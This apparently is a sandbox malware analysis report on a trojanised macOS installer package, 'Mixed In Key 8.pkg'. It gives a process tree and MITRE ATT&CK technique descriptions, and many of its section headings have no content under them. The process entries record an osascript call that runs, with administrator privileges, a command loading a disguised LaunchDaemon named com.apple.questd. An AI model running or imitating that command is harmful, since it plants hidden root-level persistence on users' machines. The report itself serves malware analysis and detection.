MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 713 Parent PID: 712

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 713 Parent PID: 712

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 713 Parent PID: 712

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 713 Parent PID: 712

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 714 Parent PID: 713

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 714 Parent PID: 713

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 715 Parent PID: 713

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 715 Parent PID: 713

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 716 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 716 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 717 Parent PID: 716

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 717 Parent PID: 716

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 717 Parent PID: 716

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 717 Parent PID: 716

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 717 Parent PID: 716

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 718 Parent PID: 717

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 718 Parent PID: 717

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 719 Parent PID: 717

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 719 Parent PID: 717

General

Start time:	19:15:04
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing .
Tactics:	Execution
Data Sources:	Anti-virus, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `/Library/Preferences` (which execute with elevated privileges) and `~/Library/Preferences` (which execute with a user's privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `/System/Library/LaunchAgents` , `/Library/LaunchAgents` , and `$HOME/Library/LaunchAgents` . These launch agents have property list files which point to the executables that will be launched . Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories . The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in . They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may leverage the `AuthorizationExecuteWithPrivileges` API to escalate privileges by prompting the user for credentials.The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature , this activity will result in a valid signature.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in `~/Library/Keychains/` , `/Library/Keychains/` , and `/Network/Library/Keychains/` . The `security` command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
Tactics:	Credential Access
Data Sources:	API monitoring, File monitoring, PowerShell logs, Process monitoring, System calls
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Mixed In Key 8.pkg

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

Dropped Files

Signature Overview

AV Detection:

Cryptography:

Privilege Escalation:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Runtime Messages

Created / dropped Files

Static File Info

General

Archive PKG

Archived Files

Extracted Files

Extracted File

Extracted File

Extracted File

Extracted File

Extracted File

Extracted File

Extracted File

Extracted File

Static Mach Info

General Information for header 1

Internal Symbols

External symbols

Extracted File

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre